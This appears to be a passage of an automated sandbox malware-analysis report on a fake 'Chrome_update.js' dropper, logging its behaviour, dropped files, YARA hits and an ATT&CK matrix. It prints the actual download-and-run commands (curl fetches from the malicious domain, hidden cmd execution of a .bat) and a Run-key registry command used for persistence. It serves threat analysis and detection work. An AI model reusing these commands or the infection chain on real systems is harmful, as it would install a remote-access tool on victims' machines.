                                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateTextFile("Z:\syscalls\318.js.csv");IServerXMLHTTPRequest2.onreadystatechange("Unsupported parameter type 00000009");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:150 o: f:open a0:%22GET%22 a1:%22https%3A%2F%2Fmangoairsoft.com%2F05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1%2F11.bat%3F81197%22 a2:false");IServerXMLHTTPRequest2.open("GET", "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf250", "false");ITextStream.WriteLine(" exec:36 f:");IServerXMLHTTPRequest2.readyState();IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:150 o: f:open r:undefined");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:177 o: f:send");IServerXMLHTTPRequest2.send();ITextStream.WriteLine(" exec:36 f:");IServerXMLHTTPRequest2.readyState();ITextStream.WriteLine(" exec:36 f:");IServerXMLHTTPRequest2.readyState();ITextStream.WriteLine(" exec:36 f:");IServerXMLHTTPRequest2.readyState();ITextStream.WriteLine(" exec:36 f:");IServerXMLHTTPRequest2.readyState();_Stream._00000000();ITextStream.WriteLine(" entry:90 o: f:open");_Stream.Open();_Stream._00000000();ITextStream.WriteLine(" exit:90 o: f:open r:undefined");_Stream.Type("1");IServerXMLHTTPRequest2.responseBody();_Stream._00000000();ITextStream.WriteLine(" entry:106 o: f:write a0:");_Stream.Write("Unsupported parameter type 00002011");_Stream._00000000();ITextStream.WriteLine(" exit:106 o: f:write r:undefined");_Stream.Position("0");_Stream._00000000();ITextStream.WriteLine(" entry:132 o: f:saveToFile a0:%22C%3A%2F%2FProgramData%2F%2FxcpCFFjZKLTFFLZfvqyQQKBvqwD.bat%22 a1:2");_Stream.SaveToFile("C://ProgramData//xcpCFFjZKLTFFLZfvqyQQKBvqwD.bat", "2");_Stream._00000000();ITextStream.WriteLine(" exit:132 o: f:saveToFile r:undefined");_Stream._00000000();ITextStream.WriteLine(" entry:144 o: f:close");_Stream.Close();_Stream._00000000();ITextStream.WriteLine(" exit:144 o: f:close r:undefined");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:177 o: f:send r:undefined");ITextStream.WriteLine(" entry:185 f:ActiveXObject a0:%22new%3A%7BF935DC22-1CF0-11D0-ADB9-00C04FD58A0B%7D%22");IWshShell3._00000000();ITextStream.WriteLine(" exit:185 f:ActiveXObject r:");IWshShell3._00000000();ITextStream.WriteLine(" entry:198 o: f:RUN a0:%22cmd%20%2Fc%20C%3A%2F%2FProgramData%2F%2FxcpCFFjZKLTFFLZfvqyQQKBvqwD.bat%22 a1:0 a2:true");IWshShell3.Run("cmd /c C://ProgramData//xcpCFFjZKLTFFLZfvqyQQKBvqwD.bat", "0", "true")
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0046CC80 push eax; ret 15_2_0046CCAE
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00459590 push ecx; mov dword ptr [esp], ecx15_2_00459591
                                Source: 7zz.exe.6.drStatic PE information: section name: .sxdata
                                Source: putty.exe.15.drStatic PE information: section name: .00cfg
                                Source: putty.exe.15.drStatic PE information: section name: .gxfg
                                Source: putty.exe.15.drStatic PE information: section name: _RDATA
                                Source: PCICL32.DLL.15.drStatic PE information: section name: .hhshare
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00471C24 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,15_2_00471C24
                                Source: initial sampleStatic PE information: section name: .text entropy: 6.909044922675825

                                Persistence and Installation Behavior

                                barindex
                                Command shell drops VBS files
                                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\b1.vbsJump to behavior
                                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\b2.vbsJump to behavior
                                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\b3.vbsJump to behavior
                                Uses cmd line tools excessively to alter registry or file data
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\remcmdstub.exeJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\PCICHEK.DLLJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\PCICL32.DLLJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\TCCTL32.DLLJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\HTCTL32.DLLJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\client32.exeJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\putty.exeJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\msvcr100.dllJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\ProgramData\7zz.exeJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\pcicapi.dllJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\remcmdstub.exeJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\PCICHEK.DLLJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\PCICL32.DLLJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\TCCTL32.DLLJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\HTCTL32.DLLJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\client32.exeJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\putty.exeJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\msvcr100.dllJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\ProgramData\7zz.exeJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\pcicapi.dllJump to dropped file
                                Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CachedXJump to behavior
                                Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CachedXJump to behavior

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Uses known network protocols on non-standard ports
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 5050
                                Source: unknownNetwork traffic detected: HTTP traffic on port 5050 -> 49702
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 5050
                                Source: unknownNetwork traffic detected: HTTP traffic on port 5050 -> 49702
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 5050
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 5050
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 5050
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 5050
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\timeout.exe TID: 7408Thread sleep count: 49 > 30Jump to behavior
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\ProgramData\7zz.exeDropped PE file which has not been started: C:\ProgramData\remcmdstub.exeJump to dropped file
                                Source: C:\ProgramData\7zz.exeDropped PE file which has not been started: C:\ProgramData\TCCTL32.DLLJump to dropped file
                                Source: C:\ProgramData\7zz.exeDropped PE file which has not been started: C:\ProgramData\putty.exeJump to dropped file
                                Source: C:\ProgramData\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0040C5F4 GetSystemInfo,15_2_0040C5F4
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0040B174 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,AreFileApisANSI,FindFirstFileA,15_2_0040B174
                                Source: C:\ProgramData\client32.exeAPI call chain: ExitProcess graph end nodegraph_18-24
                                Source: HTCTL32.DLL.15.drBinary or memory string: VMware
                                Source: curl.exe, 00000006.00000003.395102653.000001925B640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNN>
                                Source: HTCTL32.DLL.15.drBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                Source: TCCTL32.DLL.15.drBinary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                                Source: wscript.exe, 00000000.00000003.414289063.00000187DC9FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.413293014.00000187DC9F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.418793988.00000187DC9FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.423232138.00000187DE958000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.414470909.00000187DC9FC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.909133215.000000000169A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.909268832.0000000001729000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.431914961.0000000006221000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.428243784.000000000624B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.431587358.0000000006243000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.477976208.0000000001729000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: HTCTL32.DLL.15.drBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                Source: TCCTL32.DLL.15.drBinary or memory string: VMWare
                                Source: client32.exe, 00000016.00000003.423962701.00000000007CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
                                Source: curl.exe, 00000004.00000002.391810780.0000023B8DD63000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.391714475.0000023B8DD61000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000017.00000003.441714491.0000000000DCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: curl.exe, 00000008.00000003.396747142.0000016D98570000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00471C24 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,15_2_00471C24
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0046E6AA SetUnhandledExceptionFilter,15_2_0046E6AA

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\System32\wscript.exeDomain query: mangoairsoft.com
                                Source: C:\Windows\System32\wscript.exeNetwork Connect: 188.127.230.147 443Jump to behavior
                                JavaScript file contains Antivirus product strings
                                Source: Chrome_update.jsInitial file: avast, eset, avg
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C://ProgramData//xcpCFFjZKLTFFLZfvqyQQKBvqwD.batJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\sett.bat"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\7z.bat"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\qweq.bat"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\qweq.bat"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z" -o "C:\ProgramData\lolo.7z" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe" -o "C:\ProgramData\7zz.exe" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat" -o "C:\ProgramData\qweq.bat" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /h /y 7zz.exe C:\ProgramData\
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe TIMEOUT /T 7
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c C:\ProgramData\client32.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\7zz.exe C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\ Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\client32.exe C:\ProgramData\client32.exeJump to behavior
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.910282080.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000016.00000002.424736480.0000000011194000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.910282080.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000016.00000002.424736480.0000000011194000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: Shell_TrayWnd
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.910282080.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000016.00000002.424736480.0000000011194000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: Progman
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0040C756 GetSystemTime,SystemTimeToFileTime,15_2_0040C756
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0046CF4C EntryPoint,GetVersion,GetCommandLineA,15_2_0046CF4C
                                Source: Yara matchFile source: 22.2.client32.exe.6f930000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 22.0.client32.exe.240000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.client32.exe.73510000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 23.2.client32.exe.240000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.3.7zz.exe.28393f8.6.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 22.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.client32.exe.6f040000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 23.2.client32.exe.73510000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.client32.exe.240000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 22.2.client32.exe.240000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 23.2.client32.exe.6f930000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 23.0.client32.exe.240000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 22.2.client32.exe.73510000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.client32.exe.6f930000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.3.7zz.exe.237ed50.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 23.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.3.7zz.exe.238e6c8.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.3.7zz.exe.238e6c8.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.0.client32.exe.240000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.3.7zz.exe.249b790.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.3.7zz.exe.24a8280.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.3.7zz.exe.24a3908.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.3.7zz.exe.24a8280.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 22.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 23.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000012.00000000.412323829.0000000000242000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.424787693.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000003.427318962.000000000176A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.910328086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000017.00000002.442479428.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000000.422585453.0000000000242000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000003.399920793.0000000002836000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000003.427594284.000000000177D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000003.427449828.0000000001775000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000003.416840178.0000000001746000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.909682872.00000000036A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000003.425047789.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.909682872.000000000368F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000003.425987309.000000000177D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000017.00000000.440898927.0000000000242000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000003.427734474.000000000177E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000017.00000002.441826424.0000000000242000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.908996646.0000000000242000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.424736480.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.911218800.000000006F080000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000017.00000002.442419943.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.424059492.0000000000242000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.910282080.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: 7zz.exe PID: 7416, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 7492, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 7756, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 7796, type: MEMORYSTR
                                Source: Yara matchFile source: C:\ProgramData\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\client32.exe, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\PCICL32.DLL, type: DROPPED

                                Mitre Att&ck Matrix

                                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                                Valid Accounts1
                                Windows Management Instrumentation                                		1
                                DLL Side-Loading                                		1
                                DLL Side-Loading                                		1
                                Deobfuscate/Decode Files or Information                                		1
                                Input Capture                                		1
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		Exfiltration Over Other Network Medium1
                                Ingress Tool Transfer                                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                                Default Accounts321
                                Scripting                                		1
                                Registry Run Keys / Startup Folder                                		112
                                Process Injection                                		321
                                Scripting                                		LSASS Memory3
                                File and Directory Discovery                                		Remote Desktop Protocol1
                                Input Capture                                		Exfiltration Over Bluetooth11
                                Encrypted Channel                                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                                Domain Accounts1
                                Native API                                		Logon Script (Windows)1
                                Registry Run Keys / Startup Folder                                		4
                                Obfuscated Files or Information                                		Security Account Manager25
                                System Information Discovery                                		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration11
                                Non-Standard Port                                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                                Local Accounts1
                                Command and Scripting Interpreter                                		Logon Script (Mac)Logon Script (Mac)1
                                Software Packing                                		NTDS111
                                Security Software Discovery                                		Distributed Component Object ModelInput CaptureScheduled Transfer3
                                Non-Application Layer Protocol                                		SIM Card SwapCarrier Billing Fraud
                                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                                DLL Side-Loading                                		LSA Secrets2
                                Virtualization/Sandbox Evasion                                		SSHKeyloggingData Transfer Size Limits14
                                Application Layer Protocol                                		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                                Replication Through Removable MediaLaunchdRc.commonRc.common1
                                Masquerading                                		Cached Domain Credentials1
                                Process Discovery                                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                                External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                                Modify Registry                                		DCSync1
                                Remote System Discovery                                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job2
                                Virtualization/Sandbox Evasion                                		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)112
                                Process Injection                                		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
